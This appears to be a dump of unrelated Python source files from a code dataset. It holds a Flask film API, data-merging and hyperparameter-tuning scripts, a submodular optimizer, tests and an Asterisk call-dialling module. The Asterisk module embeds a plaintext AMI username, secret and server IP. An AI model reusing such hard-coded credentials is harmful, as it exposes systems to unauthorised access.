True\n\n#Create the database Model\nclass Film(db.Model):\n \"\"\"\n The database to store the films\n \"\"\"\n __tablename__ = \"films\"\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(80), nullable=False)\n director = db.Column(db.String(80), nullable=False)\n rating = db.Column(db.Integer, nullable=False)\n\n def __repr__(self):\n return f\"\"\n\n#Configure the Database, comment as necessary\n#db.drop_all()\n#db.create_all()\n\n#Create the PUT Request Parser object\nfilm_put_args = reqparse.RequestParser()\n#Define the paramaters to parse requests for, extracted data will be stored in parse_args()\nfilm_put_args.add_argument(\"title\", type=str, help='You must specify the Title of the film!', required =True)\nfilm_put_args.add_argument(\"director\", type=str, help='You must specify the Director of the film!', required=True)\nfilm_put_args.add_argument(\"rating\", type=int, help='You must specify the Rating of the film, 1 - 10!', required = True)\n\n#Create the UPDATE Request Parser object\nfilm_update_args = reqparse.RequestParser()\n#Define the paramaters to parse requests for, extracted data will be stored in parse_args(). 
Do not make all required\nfilm_update_args.add_argument(\"title\", type=str, help='You must specify the Title of the film!')\nfilm_update_args.add_argument(\"director\", type=str, help='You must specify the Director of the film!')\nfilm_update_args.add_argument(\"rating\", type=int, help='You must specify the Rating of the film, 1 - 10!')\n\n#Create the Resource field to serialize the db data object into JSON \nresource_fields = {\n \"id\" : fields.Integer,\n \"title\" : fields.String,\n \"director\" : fields.String,\n \"rating\" : fields.Integer\n}\n\n\n#Create a resource for the API\nclass Film_db(Resource):\n \"\"\"\n The Film Resource for the API \n \"\"\"\n #use the decorator to serialize the returned data\n @marshal_with(resource_fields)\n def get(self, film_id):\n #Query the DB for the film date depending on the film_id provided\n output = Film.query.filter_by(id=film_id).first()\n if output:\n return output, 200\n else: \n abort(404, message =\"There is no film with the ID \" + str(film_id))\n \n \n def put(self, film_id):\n #Try and catch the put attempt\n try:\n #the parse_args() method searches the request for the criteria in the add_argument statements above\n args = film_put_args.parse_args() \n #Add the args to the model object then commit the changes\n put_film = Film(id=film_id, title=args['title'], director=args['director'], rating=args['rating'])\n db.session.add(put_film)\n db.session.commit()\n return {\"message\":\"Your film has been added!\"}, 201 #Return a success message and an HTTP code\n #IF the fim_id is not found send an error message\n except exc.IntegrityError:\n abort(409, message =\"A film with the ID \" + str(film_id) + \" already exists in the database. Please use a different ID\")\n\n\n #use the decorator to serialize the returned data \n @marshal_with(resource_fields)\n def patch(self, film_id):\n #Create the argument object\n args = film_update_args.parse_args()\n #create the Model object\n output = Film.query.filter_by(id=film_id).first()\n #Abort if there is nothing to update\n if not output:\n abort(404, message =\"A film with the ID \" + str(film_id) + \" does not exist in the database. Please use a different ID\")\n #chek if the args attributes are not None\n if args[\"title\"]:\n output.title = args[\"title\"]\n if args[\"director\"]:\n output.director = args[\"director\"]\n if args[\"rating\"]:\n output.rating = args[\"rating\"]\n #commit the changes to the Database\n db.session.commit()\n #return the info to the user\n return output, 200\n\n\n def delete(self, film_id):\n #find the film to be deleted\n output = Film.query.filter_by(id=film_id).first()\n if output:\n #delete the film and commit the changes\n db.session.delete(output)\n db.session.commit()\n #return a success message and an HTTP code\n return {\"message\":\"Your film has been deleted!\"}, 200\n else:\n #IF the fim_id is not found send an error message \n abort(404, message =\"A film with the ID \" + str(film_id) + \" does not exist in the database. 
Please use a different ID\")\n\n\n#link the resource with the URL string and the dynamic value\napi.add_resource(Film_db, \"/film/\")\n\n\n#If this file is executed, not imported, run the application\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"Robzabel/Flask_API_Project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"984996233","text":"import pandas as pd\nimport os\n\nos.chdir(\"/home/choiboy9106/Desktop/Metis/Project McNulty\")\n\nweatherdf = pd.read_csv(\"weather.csv\")\nsp500df = pd.read_csv(\"sp500.csv\")\nsolardf = pd.read_csv(\"solar.csv\")\n\ndf = pd.merge(weatherdf, solardf, on = \"Date\")\ndel df[\"Unnamed: 0\"]\ndf = pd.merge(df, sp500df, on = \"Date\")\nprint(df)\ndel df[\"Unnamed: 0\"]\ndf.to_csv(\"all.csv\")\n\n\nweatherdf = pd.read_csv(\"weather.csv\")\nvixdf = pd.read_csv(\"vix.csv\")\nsolardf = pd.read_csv(\"solar.csv\")\n\ndf = pd.merge(weatherdf, solardf, on = \"Date\")\ndel df[\"Unnamed: 0\"]\ndf = pd.merge(df, vixdf, on = \"Date\")\nprint(df)\ndel df[\"Unnamed: 0\"]\ndf.to_csv(\"all2.csv\")\n","repo_name":"sanghumchoi/weather_stock_analysis","sub_path":"dfmerge.py","file_name":"dfmerge.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30661608926","text":"import optuna\nimport pandas as pd\nimport torch\nimport torch.optim as optim\n\nimport src.AutoRec_trainer as autorec_trainer\nimport src.MF_trainer as mf_trainer\nimport src.VAE_trainer as vae_trainer\nfrom src.data import get_data\nfrom src.loss import mrr\nfrom src.models import get_model\n\n\ndef train(model_name, model, optimizer, epochs, dl_train, dl_test, device, dataset_name, mrr_threshold=4):\n \"\"\"\n Execute the proper trainer with the right model, optimizer and relevant data loaders.\n \"\"\"\n loss = None\n if model_name == 'MF':\n loss = mf_trainer.train_mf(\n model=model, optimizer=optimizer, max_epochs=epochs, early_stopping=3,\n dl_train=dl_train, dl_test=dl_test, device=device, dataset_name=dataset_name, mrr_threshold=mrr_threshold)\n elif model_name == 'AutoRec':\n loss = autorec_trainer.train_autorec(\n model=model, optimizer=optimizer, max_epochs=epochs, early_stopping=3,\n dl_train=dl_train, dl_test=dl_test, device=device, dataset_name=dataset_name, mrr_threshold=mrr_threshold)\n elif model_name == 'VAE':\n loss = vae_trainer.train_vae(\n model=model, optimizer=optimizer, max_epochs=epochs, early_stopping=3,\n dl_train=dl_train, dl_test=dl_test, device=device, dataset_name=dataset_name, mrr_threshold=mrr_threshold)\n return loss, model\n\n\ndef tune_params(model_name, dataset_name, n_trials, max_epochs, device, mrr_threshold=4):\n \"\"\"\n Use the Optuna package for hyperparameters tuning.\n - Define the ranges for the relevant hyperparameters\n - Sample different hyperparameters combinations using RandomSampler (can be changed)\n - Train the model using the sample and keep the validation loss.\n After many trials, decide on the best hyperparameters and return both the trials results and the entire study.\n \"\"\"\n\n def objective(trial):\n if model_name == 'MF':\n params = {\n # 'learning_rate': trial.suggest_loguniform('learning_rate', 1e-5, 1e-1),\n 'learning_rate': trial.suggest_categorical('learning_rate', [0.001, 0.01, 0.1, 1]),\n 'optimizer': trial.suggest_categorical(\"optimizer\", [\"SGD\"]),\n # 'optimizer': 
trial.suggest_categorical(\"optimizer\", [\"Adam\", \"RMSprop\", \"SGD\"]),\n # 'latent_dim': trial.suggest_int(\"latent_dim\", 10, 20),\n 'latent_dim': trial.suggest_categorical(\"latent_dim\", [10, 40, 100, 300, 500]),\n 'batch_size': trial.suggest_categorical(\"batch_size\", [512])\n }\n elif model_name == 'AutoRec':\n params = {\n # 'learning_rate': trial.suggest_loguniform('learning_rate', 1e-5, 1e-1),\n 'learning_rate': trial.suggest_categorical('learning_rate', [0.001, 0.01, 0.1, 1]),\n # 'optimizer': trial.suggest_categorical(\"optimizer\", [\"Adam\", \"RMSprop\", \"SGD\"]),\n 'optimizer': trial.suggest_categorical(\"optimizer\", [\"RMSprop\"]),\n # 'optimizer': trial.suggest_categorical(\"optimizer\", [\"RMSprop\"]),\n # 'latent_dim': trial.suggest_int(\"latent_dim\", 10, 20),\n 'latent_dim': trial.suggest_categorical(\"latent_dim\", [10, 40, 100, 300, 500]),\n 'batch_size': trial.suggest_categorical(\"batch_size\", [512])\n }\n elif model_name == 'VAE':\n params = {\n 'learning_rate': trial.suggest_categorical('learning_rate', [0.0001, 0.001, 0.01, 0.1]),\n 'activation_func': trial.suggest_categorical('activation_func', ['tanh', 'relu', 'selu']),\n 'p_dims': trial.suggest_categorical('p_dims', [[200, 600], [250, 500]]),\n 'optimizer': trial.suggest_categorical(\"optimizer\", [\"Adam\", \"RMSprop\", \"SGD\"]),\n 'dropout': trial.suggest_float('dropout', 0.2, 0.5),\n 'batch_size': trial.suggest_categorical(\"batch_size\", [128, 256, 512])\n }\n\n # params = params_dict[dataset_name][model_name] # Get the relevant params range by the dataset and model\n dl_train, dl_valid, _, _ = get_data(\n model_name=model_name, dataset_name=dataset_name, batch_size=params['batch_size'], device=device)\n model = get_model(model_name, params, dl_train) # Build model\n optimizer = getattr(optim, params['optimizer'])(\n model.parameters(), lr=params['learning_rate']) # Instantiate optimizer\n valid_loss, _ = train(model_name, model, optimizer, max_epochs, dl_train, dl_valid, device,\n dataset_name, mrr_threshold=mrr_threshold) # Train the model and calc the validation loss\n\n return valid_loss\n\n study = optuna.create_study(\n direction=\"minimize\", sampler=optuna.samplers.RandomSampler()) # Build the study\n # Optimize (the actual tuning process)\n study.optimize(objective, n_trials=n_trials)\n # Extract the trials information as Pandas DataFrame\n df_trials_results = study.trials_dataframe()\n\n return study, df_trials_results\n\n\ndef calc_final_mrr(model_name, model, dl_test, mrr_threshold=4):\n \"\"\"\n Calculate the final MRR score for the fully trained model.\n Based on the model type, extract the entire test set, \n evaluate it with the trained model and calculate the MRR score.\n \"\"\"\n if model_name == 'MF':\n test_users, test_items, y_test = dl_test.dataset.get_all_data()\n\n # Generate predictions\n model.eval()\n with torch.no_grad():\n y_preds = model(test_users, test_items)\n\n # Prepare full rating matrixs for the MRR calculation\n # True rating matrix\n test_users = torch.clone(test_users.detach()).to('cpu')\n test_items = torch.clone(test_items.detach()).to('cpu')\n y_test = torch.clone(y_test.detach()).to('cpu')\n df_true = pd.DataFrame(\n {'user_id': test_users, 'item_id': test_items, 'rating': y_test})\n ratings_true = df_true.pivot(\n index='user_id', columns='item_id', values='rating').fillna(0)\n # Predicted rating matrix\n y_preds = torch.clone(y_preds.detach()).to('cpu')\n df_preds = pd.DataFrame(\n {'user_id': test_users, 'item_id': test_items, 'rating': y_preds})\n 
ratings_preds = df_preds.pivot(\n index='user_id', columns='item_id', values='rating').fillna(0)\n mrr_ = mrr(pred=ratings_preds.values, actual=ratings_true.values,\n cutoff=5, mrr_threshold=mrr_threshold)\n else: # AutoRec & VAE\n x = y_test = dl_test.dataset.get_all_data()\n # Generate predictions\n model.eval()\n with torch.no_grad():\n y_preds = model(x)\n\n # In AutoRec & VAE the predictions are already in the shape of rating matrixs so no need in processing\n if model_name == 'AutoRec':\n mrr_ = mrr(pred=y_preds.cpu().numpy(), actual=y_test.cpu(\n ).numpy(), cutoff=5, mrr_threshold=mrr_threshold)\n elif model_name == 'VAE':\n mrr_ = mrr(pred=y_preds[0].cpu().numpy(), actual=y_test.cpu(\n ).numpy(), cutoff=5, mrr_threshold=mrr_threshold)\n\n return mrr_\n\n\ndef final_train(model_name, dataset_name, best_params, max_epochs, device, mrr_threshold=4):\n \"\"\"\n After we optimized and choosed the best hyperparameters for the model we want to prepare it for predicting the test set.\n - Use the best hyperparameters to build the final model\n - Train the final model on the train+validation data sets (full_train)\n - Test it against the test set for final results\n \"\"\"\n _, _, dl_test, dl_full_train = get_data(\n model_name=model_name, dataset_name=dataset_name, batch_size=best_params['batch_size'], device=device)\n model = get_model(model_name, best_params, dl_full_train) # Build model\n optimizer = getattr(optim, best_params['optimizer'])(\n model.parameters(), lr=best_params['learning_rate']) # Instantiate optimizer\n # Train the model on the full_train (train+valid) set and calc the test loss\n test_loss, final_model = train(model_name, model, optimizer, max_epochs,\n dl_full_train, dl_test, device, dataset_name, mrr_threshold=mrr_threshold)\n\n mrr_ = calc_final_mrr(model_name=model_name, model=final_model,\n dl_test=dl_test, mrr_threshold=mrr_threshold)\n\n return test_loss, final_model, mrr_\n\n\n# Only for testing\nif __name__ == '__main__':\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n dataset_name = 'books'\n max_epochs = 2\n n_trials = 2\n mrr_threshold = 8\n model_name = 'VAE' # 'AutoRec' # 'MF' # \"VAE\"\n\n study_ml, df_tuning_results = tune_params(\n model_name=model_name,\n dataset_name=dataset_name,\n max_epochs=max_epochs,\n n_trials=n_trials,\n device=device,\n mrr_threshold=mrr_threshold\n )\n\n best_params = study_ml.best_params\n print(f'Best params: {best_params}')\n print(df_tuning_results.sort_values(by='value').head(15))\n\n # Full train\n test_loss, final_model, test_mrr = final_train(\n model_name=model_name,\n dataset_name=dataset_name,\n best_params=best_params,\n max_epochs=max_epochs,\n device=device\n )\n print(f'Final test loss = {test_loss}\\nFinal test MRR = {test_mrr}')\n","repo_name":"GuyAttia/MSC-RecSys-Project","sub_path":"src/hyperparams_tuning.py","file_name":"hyperparams_tuning.py","file_ext":"py","file_size_in_byte":9354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"12914511387","text":"import os.path\nimport sys\nimport argparse\n\nfrom scannerpy import Database, Job\nfrom scannerpy import ProtobufGenerator, Config\n\narg_parser = argparse.ArgumentParser(\n description='Perform SIFT extraction on input images.')\narg_parser.add_argument('--scanner_config', dest='scanner_config',\n help='the path to the scanner config file')\narg_parser.add_argument('--input_table', dest='input_table', default='frames',\n help='the input table where the frames and frame 
ids are stored')\narg_parser.add_argument('--output_table', dest='output_table',\n help='the name of the output table', default='extraction')\narg_parser.add_argument(\n '--packet_size', dest='packet_size', type=int, default=25, help='the number of frames to dispatch to each extraction kernel')\nargs = arg_parser.parse_args()\n\ndb = Database(config_path=args.scanner_config)\n\ncwd = os.path.dirname(os.path.abspath(__file__))\ndb.load_op(\n os.path.join(cwd, 'op_cpp/build/libextraction_op.so'),\n os.path.join(cwd, 'op_cpp/build/siftExtraction_pb2.py'))\n\nimage_ids = db.sources.Column()\nframes = db.sources.FrameColumn()\n\n# run SIFT extractions\nkeypoints, descriptors, cameras = db.ops.SiftExtraction(\n image_ids=image_ids, frames=frames)\n\noutput = db.sinks.Column(\n columns={'image_id': image_ids, 'keypoints': keypoints, 'descriptors': descriptors, 'camera': cameras})\n\njob = Job(op_args={\n image_ids: db.table(args.input_table).column('image_id'),\n frames: db.table(args.input_table).column('frame'),\n output: args.output_table})\n\noutput_tables = db.run(output, [job], force=True,\n io_packet_size=args.packet_size, work_packet_size=args.packet_size)\nprint(db.summarize())\n","repo_name":"garyjyzhang/scanner-colmap","sub_path":"integration/extraction.py","file_name":"extraction.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"6008982874","text":"from handle_missing_values import MissingValues\r\nfrom handle_outliers import Outliers\r\n\r\nclass CleanDataPipeline:\r\n def __init__(self,data):\r\n self.data = data \r\n\r\n def getContinousVars(self):\r\n continous_variables = []\r\n for col in self.data.columns:\r\n if len(self.data[col].value_counts().to_list())>50 and col!='Id':\r\n continous_variables.append(col)\r\n \r\n return continous_variables\r\n\r\n def runCleanPipeline(self):\r\n missingvalues = MissingValues(self.data)\r\n outliers = Outliers(self.data)\r\n filledMissingValues_df = missingvalues.fillMissingValues(self.data)\r\n removed_outliers_df = outliers.removeOutliers(dataframe=filledMissingValues_df, continous_variables=self.getContinousVars())\r\n\r\n return removed_outliers_df\r\n","repo_name":"shubh2016shiv/probability-of-default-prediction","sub_path":"clean_data_pipeline.py","file_name":"clean_data_pipeline.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4216679038","text":"import pytest\n\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.db import models\nfrom django.test import override_settings\n\nfrom psqlextra.manager import PostgresManager\nfrom psqlextra.models import PostgresModel\n\nfrom .fake_model import get_fake_model\n\n\n@pytest.mark.parametrize(\n \"databases\",\n [\n {\"default\": {\"ENGINE\": \"psqlextra.backend\"}},\n {\n \"default\": {\"ENGINE\": \"django.db.backends.postgresql\"},\n \"other\": {\"ENGINE\": \"psqlextra.backend\"},\n },\n {\n \"default\": {\"ENGINE\": \"psqlextra.backend\"},\n \"other\": {\"ENGINE\": \"psqlextra.backend\"},\n },\n ],\n)\ndef test_manager_backend_set(databases):\n \"\"\"Tests that creating a new instance of :see:PostgresManager succeseeds\n without any errors if one or more databases are configured with\n `psqlextra.backend` as its ENGINE.\"\"\"\n\n with override_settings(DATABASES=databases):\n assert PostgresManager()\n\n\ndef test_manager_backend_not_set():\n \"\"\"Tests whether 
creating a new instance of\n :see:PostgresManager fails if no database\n has `psqlextra.backend` configured\n as its ENGINE.\"\"\"\n\n with override_settings(\n DATABASES={\"default\": {\"ENGINE\": \"django.db.backends.postgresql\"}}\n ):\n with pytest.raises(ImproperlyConfigured):\n PostgresManager()\n\n\ndef test_manager_truncate():\n \"\"\"Tests whether truncating a table works.\"\"\"\n\n model = get_fake_model({\"name\": models.CharField(max_length=255)})\n\n model.objects.create(name=\"henk1\")\n model.objects.create(name=\"henk2\")\n\n assert model.objects.count() == 2\n model.objects.truncate()\n assert model.objects.count() == 0\n\n\n@pytest.mark.django_db(transaction=True)\ndef test_manager_truncate_cascade():\n \"\"\"Tests whether truncating a table with cascade works.\"\"\"\n\n model_1 = get_fake_model({\"name\": models.CharField(max_length=255)})\n\n model_2 = get_fake_model(\n {\n \"name\": models.CharField(max_length=255),\n \"model_1\": models.ForeignKey(\n model_1, on_delete=models.CASCADE, null=True\n ),\n }\n )\n\n obj_1 = model_1.objects.create(name=\"henk1\")\n model_2.objects.create(name=\"henk1\", model_1_id=obj_1.id)\n\n assert model_1.objects.count() == 1\n assert model_2.objects.count() == 1\n\n model_1.objects.truncate(cascade=True)\n\n assert model_1.objects.count() == 0\n assert model_2.objects.count() == 0\n\n\ndef test_manager_truncate_quote_name():\n \"\"\"Tests whether the truncate statement properly quotes the table name.\"\"\"\n\n model = get_fake_model(\n {\"name\": models.CharField(max_length=255)},\n PostgresModel,\n {\n # without quoting, table names are always\n # lower-case, using a capital case table\n # name requires quoting to work\n \"db_table\": \"MyTable\"\n },\n )\n\n model.objects.create(name=\"henk1\")\n model.objects.create(name=\"henk2\")\n\n assert model.objects.count() == 2\n model.objects.truncate()\n assert model.objects.count() == 0\n","repo_name":"SectorLabs/django-postgres-extra","sub_path":"tests/test_manager.py","file_name":"test_manager.py","file_ext":"py","file_size_in_byte":3079,"program_lang":"python","lang":"en","doc_type":"code","stars":647,"dataset":"github-code","pt":"72"} +{"seq_id":"15973280999","text":"import warnings\nfrom typing import Set, TypeVar, Tuple, Iterable\n\nfrom submodmax.value_reuse.abstract_optimizer import AbstractSubmodularFunctionValueReuse, AbstractOptimizerValueReuse, FuncInfo\nfrom submodmax.value_reuse.set_info import SetInfo\n\nE = TypeVar('E')\n\n\nclass AbstractDoubleGreedySearchValueReuse(AbstractOptimizerValueReuse):\n \"\"\"\n Parent class for Deterministic and\n Randomized Unconstrained submodular maximization, by Buchbinder and Feldman\n\n See also:\n Buchbinder, N., Feldman, M., Naor, J. S., & Schwartz, R. (2015).\n A tight linear time (1/2)-approximation for unconstrained submodular maximization.\n SIAM Journal on Computing, 44(5), 1384–1402. 
https://doi.org/10.1137/130929205\n\n \"\"\"\n\n def __init__(self, objective_function: AbstractSubmodularFunctionValueReuse, ground_set: Set[E],\n debug: bool = True):\n super().__init__(objective_function, ground_set, debug)\n\n self.class_name = 'submodmax.value_reuse.AbstractDoubleGreedySearch'\n\n def should_update_X(self, a: float, b: float) -> bool:\n raise NotImplementedError('abstract method')\n\n def ground_set_iterator(self) -> Iterable[E]:\n raise NotImplementedError('abstract method')\n\n def optimize(self) -> Tuple[SetInfo, FuncInfo]:\n if self.debug:\n print(\"=====================================================================\")\n print(\"START\", self.class_name, \"optimizer\")\n print(\"=====================================================================\")\n ground_set_size = len(self.ground_set)\n empty_set = set()\n\n X_prev_set_info: SetInfo = SetInfo(\n ground_set_size=ground_set_size,\n current_set_size=0,\n added_elems=empty_set,\n deleted_elems=empty_set,\n intersection_previous_and_current_elems=empty_set\n )\n X_prev_set_info.set_current_set(set())\n\n Y_prev_set_info = SetInfo(\n ground_set_size=ground_set_size,\n current_set_size=ground_set_size,\n added_elems=self.ground_set,\n deleted_elems=empty_set,\n intersection_previous_and_current_elems=empty_set\n )\n Y_prev_set_info.set_current_set(self.ground_set.copy())\n\n func_info_X_prev: FuncInfo = self.objective_function.evaluate(X_prev_set_info, previous_func_info=None)\n func_info_Y_prev: FuncInfo = self.objective_function.evaluate(Y_prev_set_info, previous_func_info=None)\n\n if self.debug:\n print(\"initialization:\")\n print(\"X0 : size: \", X_prev_set_info.current_set_size, \"/\", ground_set_size, \", f(S): \",\n func_info_X_prev.func_value)\n print(\"Y0: size: \", Y_prev_set_info.current_set_size, \"/\", ground_set_size, \", f(S): \",\n func_info_Y_prev.func_value)\n\n elem: E\n for i, elem in enumerate(self.ground_set_iterator(), 1):\n\n singleton_set: Set[E] = {elem}\n\n # X_prev_plus_elem: Set[E] = X_prev | {elem}\n X_prev_plus_elem_set_info = SetInfo(\n ground_set_size=ground_set_size,\n current_set_size=X_prev_set_info.current_set_size + 1,\n added_elems=singleton_set,\n deleted_elems=empty_set,\n intersection_previous_and_current_elems=X_prev_set_info.current_set\n )\n\n func_info_X_prev_plus_elem: FuncInfo = self.objective_function.evaluate(\n X_prev_plus_elem_set_info, func_info_X_prev)\n a: float = func_info_X_prev_plus_elem.func_value - func_info_X_prev.func_value\n\n Y_prev_minus_elem_set: Set[E] = Y_prev_set_info.current_set - {elem}\n Y_prev_minus_elem_set_info = SetInfo(\n ground_set_size=ground_set_size,\n current_set_size=Y_prev_set_info.current_set_size - 1,\n added_elems=empty_set,\n deleted_elems=singleton_set,\n intersection_previous_and_current_elems=Y_prev_minus_elem_set\n )\n Y_prev_minus_elem_set_info.set_current_set(Y_prev_minus_elem_set)\n func_info_Y_prev_minus_elem = self.objective_function.evaluate(\n Y_prev_minus_elem_set_info, func_info_Y_prev)\n b: float = func_info_Y_prev_minus_elem.func_value - func_info_Y_prev.func_value\n\n if self.debug:\n print()\n print(\"element \", i, \"/\", ground_set_size)\n print(\"\\t X_prev --> size: \", X_prev_set_info.current_set_size, \", f(S):\",\n func_info_X_prev.func_value)\n print(\"\\t X\" + str(i) + \" + e\" + str(i) + \" --> size: \", X_prev_plus_elem_set_info.current_set_size,\n \", f(S):\",\n func_info_X_prev_plus_elem.func_value)\n print()\n print(\"\\t Y_prev --> size: \", Y_prev_set_info.current_set_size, \", f(S):\",\n 
func_info_Y_prev.func_value)\n print(\"\\t Y\" + str(i) + \" - e\" + str(i) + \" --> size: \", Y_prev_minus_elem_set_info.current_set_size,\n \", f(S):\",\n func_info_Y_prev_minus_elem.func_value)\n\n if self.should_update_X(a, b):\n\n new_set = X_prev_set_info.current_set | singleton_set\n X_prev_plus_elem_set_info.set_current_set(new_set)\n X_prev_set_info = X_prev_plus_elem_set_info\n\n func_info_X_prev = func_info_X_prev_plus_elem\n # Y_prev stays the same\n if self.debug:\n print(\"\\tX_prev --> size:\", X_prev_set_info.current_set_size, \", f(X_prev):\",\n func_info_X_prev.func_value)\n else:\n # X_prev stays the same\n Y_prev_set_info = Y_prev_minus_elem_set_info\n func_info_Y_prev = func_info_Y_prev_minus_elem\n if self.debug:\n print(\"\\tY_prev --> size:\", Y_prev_set_info.current_set_size, \", f(Y_prev):\",\n func_info_Y_prev.func_value)\n\n warnings.warn(\"remove equality check\")\n if not X_prev_set_info.current_set == Y_prev_set_info.current_set:\n raise Exception(\"both sets should be equal\")\n\n if self.debug:\n print(\"-- finished iteration --\")\n print(\"X_prev --> size:\", X_prev_set_info.current_set_size, \", f(X_prev):\", func_info_X_prev.func_value)\n print(\"Y_prev --> size:\", Y_prev_set_info.current_set_size, \", f(Y_prev):\", func_info_Y_prev.func_value)\n print(\"obj val local optimum:\", str(func_info_X_prev.func_value))\n return X_prev_set_info, func_info_X_prev\n","repo_name":"joschout/SubmodularMaximization","sub_path":"submodmax/value_reuse/abstract_double_greedy_search.py","file_name":"abstract_double_greedy_search.py","file_ext":"py","file_size_in_byte":6733,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"72"} +{"seq_id":"5438528143","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 7 12:41:12 2017\n\n@author: ksagilop\n\nSimple Graphs Tutorial using pylab\n\"\"\"\n# Modules\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Data\nx = [0,1,2,3,4,5]\ny = [3,10,15,17,22,23]\nz = [4,7,2,21,15,18]\nk = [10,15,45,12,30,85]\nm = [10,52,60,30,80,125]\n\n# Plot\nplt.title('Simple Graph Line example')\nplt.xlabel('This is label x')\nplt.ylabel('This is label y')\n#pl.axis([-1,5,-1,25])\nplt.scatter(x,y, c=m, s=k, label='label 1')\nplt.scatter(x,z, s=k, label='label 2')\n#pl.plot(x,z, 'ro', label='set 2')\nplt.legend(title='La Leyenda')\nplt.show()\n\n# Or\n#pl.plot(x,y, color='green', linestyle='dashed', marker='o',\n# markerfacecolor='blue', markersize=12)\n#pl.show()\n","repo_name":"pandastrail/InfoEng","sub_path":"scripting/exercises/p02_7.py","file_name":"p02_7.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28954825566","text":"from multiprocessing import Pool\nimport threading\nimport ast\nfrom asterisk.ami import AMIClient\nfrom asterisk.ami import SimpleAction\nfrom application_util import product_operation, caller_operation\nfrom custome_audio_generation import generate_audio\nfrom database_util import application_db\n\n\"\"\" update the channel dedtails once the call initiated \"\"\"\n\n\ndef update_channel_detail_call_initiated():\n\n available_channels_details = application_db.get_available_channels()\n\n available_channel = available_channels_details[\"available_channel\"]\n running_channel = available_channels_details[\"running_channel\"]\n\n available_channel = available_channel - 1\n running_channel = running_channel + 1\n\n 
application_db.update_channel_details(available_channel, running_channel)\n\n return True\n\n\n\"\"\" call initaition from SPI server \"\"\"\n\n\ndef call_initiation(transaction_id, mobile_no, product_type, prefix, context=\"0009\"):\n try:\n client = AMIClient(address='10.101.1.184', port=5038)\n client.login(username='gihosp', secret='gihosp123')\n\n action = SimpleAction(\n 'Originate',\n Channel=\"local/\"+\"6\"+mobile_no+\"@from-internal\",\n Context=\"GIVoice\",\n Exten=context,\n Priority=1,\n Account=product_type,\n CallerID=transaction_id,\n Async=\"yes\",\n Timeout=50000\n )\n future = client.send_action(action)\n response = future.response\n\n update_channel_detail_call_initiated()\n return True\n except Exception as ex:\n raise Exception(\n \"SIP server is down .. please check eject error {}\".format(str(ex)))\n return True\n\n\ndef customer_data_call_initiation_process(customer_datas, prefix):\n\n try:\n threads = []\n for index, customer_data in enumerate(customer_datas):\n input_list = []\n '''parse the product details from customer data'''\n #caller_data = customer_data.decode().split(\"$$$\")\n\n caller_data = customer_data\n\n transaction_id = str(caller_data[0])\n mobile_no = str(caller_data[2])\n language = str(caller_data[3]).strip()\n product_type = str(caller_data[16])\n\n split_def_product_type = product_type.split()\n\n product_type = product_type.replace(\" \", \"_\")\n\n try:\n sub_product = split_def_product_type[0] + \\\n \"_\" + split_def_product_type[1]\n except:\n sub_product = product_type\n\n product = split_def_product_type[0]\n\n ''' insert new caller data while call initiation '''\n if caller_operation.insert_new_caller_data(transaction_id, caller_data):\n\n ''' get product config details via customer product '''\n product_config = product_operation.get_product_config(product)\n\n ''' if product is active status means it will initiate the call '''\n if product_config[\"status\"] == 1:\n\n ''' check to create custome audio '''\n if product_config[\"is_call_initiate_custome_audio\"] == 1:\n\n ''' generate custome audio while call initiazation itself'''\n generate_audio.generic_audio_generation(\n product_config[\"question_flow\"], transaction_id, language, caller_data)\n\n # call_initiation(transaction_id, mobile_no,\n # product_type, prefix, product_config[\"context\"])\n\n # t = threading.Thread(target=call_initiation, args=(transaction_id, mobile_no,\n # product_type, prefix, product_config[\"context\"]),)\n # threads.append(t)\n # t.start()\n input_list.append(transaction_id)\n input_list.append(mobile_no)\n input_list.append(product_type)\n input_list.append(prefix)\n input_list.append(product_config[\"context\"])\n threads.append(input_list)\n else:\n return False\n else:\n return False\n\n pool = Pool(processes=3)\n pool.starmap(call_initiation, threads)\n pool.close()\n return True\n except Exception as ex:\n return False\n","repo_name":"NarasimmanSaravana1994/Generic-Voice-Bot","sub_path":"application_util/call_initiation.py","file_name":"call_initiation.py","file_ext":"py","file_size_in_byte":4466,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"33417820796","text":"from matplotlib import pyplot\n\ndef get_loan_info():\n \"\"\"Get the basic information of a loan and store it in a dictionary\"\"\"\n #Create a blank dict to represent a loan\n loan = {}\n \n #Get user input for the categories of the loan\n loan['principal'] = float(input(\"Enter the loan amount: \"))\n loan['rate'] = 
float(input(\"Enter the interest rate: \"))/100\n loan['monthly payment'] = float(input(\"Enter the desired monthly payment amount: \"))\n loan['money paid'] = 0\n \n return loan\n \n \ndef show_loan_info(loan, number):\n \"\"\"Display the current loan status\"\"\"\n print(\"\\n----Loan information after \" + str(number) + \" months----\")\n for key, value in loan.items():\n print(key.title() + \": \" + str(value))\n \n \ndef collect_interest(loan):\n \"\"\"Update loan for interest per month\"\"\"\n #Divide by 12 to simulate collecting interest monthly\n loan['principal'] = loan['principal'] + loan['principal']*loan['rate']/12\n\ndef make_monthly_payment(loan):\n \"\"\"Simulate making a monthly payment to pay down the principal\"\"\"\n loan['principal'] = loan['principal'] - loan['monthly payment']\n \n #You are required to make a full payment this month, you have not yet payed off your loan\n if loan['principal'] > 0:\n loan['money paid'] += loan['monthly payment']\n #You are not required to make a full payment this month, you have payed off your loan\n 